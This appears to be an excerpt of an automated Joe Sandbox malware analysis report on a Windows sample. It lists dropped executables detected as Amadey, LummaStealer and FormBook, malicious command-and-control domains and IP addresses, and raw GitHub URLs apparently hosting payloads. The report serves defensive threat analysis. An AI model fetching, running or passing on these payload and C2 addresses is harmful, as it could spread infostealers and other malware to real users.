C:\ProgramData\msvcp140.dll | 0% | ReversingLabs |
C:\ProgramData\msvcp140.dll | 0% | Virustotal |
C:\ProgramData\nss3.dll | 0% | ReversingLabs |
C:\ProgramData\nss3.dll | 0% | Virustotal |
C:\ProgramData\softokn3.dll | 0% | ReversingLabs |
C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1] | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe | 38% | ReversingLabs | Win32.Infostealer.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe | 67% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe | 57% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe | 58% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[4].exe | 8% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[5].exe | 28% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe | 87% | ReversingLabs | Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exe | 68% | ReversingLabs | Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1] | 75% | ReversingLabs | ByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | 87% | ReversingLabs | Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | 57% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe | 38% | ReversingLabs | Win32.Infostealer.Generic
C:\Users\user\AppData\Local\Temp\1019035001\964c9facda.exe | 58% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1019036001\164919d456.exe | 68% | ReversingLabs | Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\1019037001\9905c00c72.exe | 8% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\1019038001\fcd2b0e3cd.exe | 67% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook
C:\Users\user\AppData\Local\Temp\1019040001\73c096c84a.exe | 28% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\1v1w92NeCw3SKGKedet\Bunifu_UI_v1.5.3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\1v1w92NeCw3SKGKedet\Y-Cleaner.exe | 75% | ReversingLabs | ByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\main\7z.dll | 0% | ReversingLabs |
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
https://steamcommunity.com/profiles/76561199809363512 | true | |
aspecteirs.lat | true | |
sweepyribs.lat | true | |
sustainskelet.lat | true | |
rapeflowwj.lat | true | |
energyaffai.lat | true | |
grannyejh.lat | true | |
necklacebudi.lat | true | |
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | 77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmp | false | |
https://duckduckgo.com/ac/?q= | 77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmp | false | |
https://discokeyus.lat/U | 77594b3442.exe, 00000031.00000003.3137575871.0000000000515000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3075295928.0000000000515000.00000004.00000020.00020000.00000000.sdmp | false | |
http://schemas.datacontract.org | 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D549F000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D57CE000.00000004.00000800.00020000.00000000.sdmp | false | |
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417. | 77594b3442.exe, 00000031.00000003.3040740995.000000000053B000.00000004.00000020.00020000.00000000.sdmp | false | |
http://schemas.datacontract.org/2004/07/StoreInstaller.Models | 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D549F000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D57CE000.00000004.00000800.00020000.00000000.sdmp | false | |
https://g.live.com/odclientsettings/ProdV2.C: | svchost.exe, 0000002D.00000003.2733073587.000001EE6AD03000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000002D.00000003.2733073587.000001EE6AD22000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000002D.00000003.2733073587.000001EE6AD48000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000002D.00000003.2733073587.000001EE6AD67000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000002D.00000003.2733073587.000001EE6AD54000.00000004.00000800.00020000.00000000.sdmp | false | |
http://schemas.datacontract.org/2004/07/StoreInstaller.ModelspXu | 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D57CE000.00000004.00000800.00020000.00000000.sdmp | false | |
https://discokeyus.lat/c | 77594b3442.exe, 00000031.00000003.3137575871.0000000000515000.00000004.00000020.00020000.00000000.sdmp | false | |
https://t.me/k04ael | 4268204ace.exe, 0000000F.00000002.2742198429.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2742198429.0000000003CBA000.00000004.00000800.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745507177.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000000.2720818695.0000000000423000.00000008.00000001.01000000.00000013.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2776399397.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745507177.000000000079D000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2776399397.0000000000779000.00000004.00000020.00020000.00000000.sdmp | false | |
https://curl.se/docs/hsts.html | 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmp | false | |
https://g.live.com/odclientsettings/Prod.C: | svchost.exe, 0000002D.00000003.2733073587.000001EE6ACD2000.00000004.00000800.00020000.00000000.sdmp | false | |
http://defaultcontainer/StoreInstaller;component/Resources/Theme/Light.xaml | 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D5708000.00000004.00000800.00020000.00000000.sdmp | false | |
                                                                https://frostman.shop/#7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2824507847.00000000007A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  https://grannyejh.lat:443/api77594b3442.exe, 00000039.00000002.3103939592.0000000000549000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    https://aka.ms/pscore6lBpowershell.exe, 00000020.00000002.2595289423.0000000005321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2631755685.0000000005091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi77594b3442.exe, 00000031.00000003.3040740995.000000000053B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        https://frostman.shop//7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2872982174.00000000007A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          https://nuget.org/nuget.exepowershell.exe, 00000020.00000002.2598419733.0000000006387000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2642561965.00000000060F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            https://discokeyus.lat/l77594b3442.exe, 00000039.00000003.3063497186.0000000000575000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3104578420.0000000000575000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              http://185.156.73.23/K0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3202086239.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3146323550.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3176254742.0000000005552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                http://defaultcontainer/StoreInstaller;component/Resources/StoreAppList.Light.png5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D551B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  https://github.com/Urijas/moperats/raw/refs/heads/main/ktyihkdfesf.exe4268204ace.exe, 0000000F.00000000.2555729362.00000000007D2000.00000002.00000001.01000000.0000000C.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002B59000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4268204ace.exe, 0000000F.00000002.2729833635.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2595289423.0000000005321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2631755685.0000000005091000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D551B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 0000002D.00000003.2733073587.000001EE6AD22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc9477594b3442.exe, 00000031.00000003.3040740995.000000000053B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          https://raw.githubusercontent.comD4268204ace.exe, 0000000F.00000002.2729833635.0000000002C75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            http://schemas.datacontract.org/5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D549F000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D57CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000028.00000002.2631755685.00000000051E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000020.00000002.2595289423.0000000005475000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2631755685.00000000051E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  http://schemas.datacontract.org/2004/07/5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D549F000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D57CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000028.00000002.2631755685.00000000051E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      https://t.me/p7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745507177.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745170967.00000000007A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        https://contoso.com/Iconpowershell.exe, 00000028.00000002.2642561965.00000000060F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl077594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta77594b3442.exe, 00000031.00000003.3040740995.000000000053B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                https://t.me/k04aelm0nk3Mozilla/5.07d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000000.2720818695.0000000000423000.00000008.00000001.01000000.00000013.sdmpfalse
                                                                                                                  https://raw.githubusercontent.com/Urijas/moperats/refs/heads/main/biyjdfjadaw.exe4268204ace.exe, 0000000F.00000002.2729833635.0000000002C0C000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002C75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    http://ocsp.rootca1.amazontrust.com0:77594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201677594b3442.exe, 00000031.00000003.2968639998.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2942066458.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2970465845.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2941963499.0000000005301000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2968949040.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 513dad5c05.exe, 00000038.00000003.3191808258.0000000005610000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        https://curl.se/docs/alt-svc.html9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          https://xmrig.com/wizardIntel_PTT_EK_Recertification.exe, 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000024.00000002.2597932225.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, explorer.exe, 00000033.00000002.2995871768.00000001402DD000.00000002.00000001.00020000.00000000.sdmpfalse
                                                                                                                            https://www.ecosia.org/newtab/77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br77594b3442.exe, 00000031.00000003.3014208025.000000000565E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000028.00000002.2631755685.00000000051E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  http://www.w3.oh5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D549F000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D57CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    http://defaultcontainer/StoreInstaller;component/Resources/app.Light.ico5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D5708000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      https://httpbin.org/ipbefore9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        http://185.156.73.23/files/download10577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3202086239.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3146323550.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3176254742.0000000005552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          http://crl.micropowershell.exe, 00000028.00000002.2650660528.0000000008A62000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3148185991.00000000004FE000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000003.3060235969.00000000005B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            https://raw.githubusercontent.com4268204ace.exe, 0000000F.00000002.2729833635.0000000002C75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              http://foo/Resources/StoreLogo.Light.png5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D551B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                https://support.microsof77594b3442.exe, 00000031.00000003.2941963499.0000000005301000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000020.00000002.2595289423.0000000005475000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2631755685.00000000051E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.07d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000000.2720818695.0000000000423000.00000008.00000001.01000000.00000013.sdmpfalse
                                                                                                                                                      http://raw.githubusercontent.com4268204ace.exe, 0000000F.00000002.2729833635.0000000002C75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        https://frostman.shop/7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2872982174.00000000007A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          http://185.156.73.23/files/download0577f55121.exe, 0000002E.00000003.3176254742.0000000005552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            https://frostman.shop/d$7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2923711164.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2898848742.00000000007A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              http://185.156.73.23/dll/key0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3202086239.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3146323550.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3176254742.0000000005552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                https://discokeyus.lat:443/api77594b3442.exe, 00000031.00000003.2969030804.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2968852424.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3103939592.0000000000549000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples77594b3442.exe, 00000031.00000003.2942066458.00000000052D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://t.me/Iu7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745507177.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745170967.00000000007A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      http://185.156.73.23/files/downloadK0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        http://html4/loose.dtd9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://t.me/7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745507177.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745170967.00000000007A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            http://185.156.73.23/files/downloadM0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://frostman.shop/u%7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2824507847.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2801209203.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2775102059.00000000007A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://web.telegram.org7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745170967.00000000007A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://github.com4268204ace.exe, 0000000F.00000002.2729833635.0000000002BCE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    https://t.me/07d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745170967.00000000007A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      https://contoso.com/Licensepowershell.exe, 00000028.00000002.2642561965.00000000060F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://frostman.shop/w7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2923711164.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2898848742.00000000007A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            http://foo/bar/resources/storelogo.light.png5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D551B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://discokeyus.lat/apion_pre77594b3442.exe, 00000031.00000003.3075295928.0000000000524000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3137575871.0000000000524000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                https://discokeyus.lat/api77594b3442.exe, 00000031.00000003.3040855267.00000000052A9000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3148807130.00000000052B1000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3148640294.00000000052AE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3075295928.0000000000507000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2968852424.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000003.3063497186.0000000000575000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3103939592.0000000000552000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3104578420.0000000000575000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3104470563.000000000056D000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000003.3063570796.000000000056D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e1777594b3442.exe, 00000031.00000003.2968639998.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2942066458.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2970465845.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2941963499.0000000005301000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2968949040.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 513dad5c05.exe, 00000038.00000003.3191808258.0000000005610000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    http://.css9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      http://185.156.73.23/files/downloadc0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3202086239.0000000005552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://discokeyus.lat:443/apiK77594b3442.exe, 00000031.00000003.3040855267.00000000052AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          http://foo/bar/resources/app.light.ico5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D5708000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            http://github.com4268204ace.exe, 0000000F.00000002.2729833635.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002BDA000.00000004.00000800.00020000.00000000.sdmpfalse
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579188
Start date and time: 2024-12-21 03:12:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 21m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 63
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.mine.winEXE@132/124@0/23
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 55%
• Number of executed functions: 240
• Number of non-executed functions: 198
                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                                                                              • Max analysis timeout: 600s exceeded, the analysis took too long
                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                                                                              • Execution Graph export aborted for target 4268204ace.exe, PID 7312 because it is empty
• Execution Graph export aborted for target explorer.exe, PID 2368 because there are no executed functions
                                                                                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 1020 because it is empty
• Not all processes were analyzed, report is missing behavior information
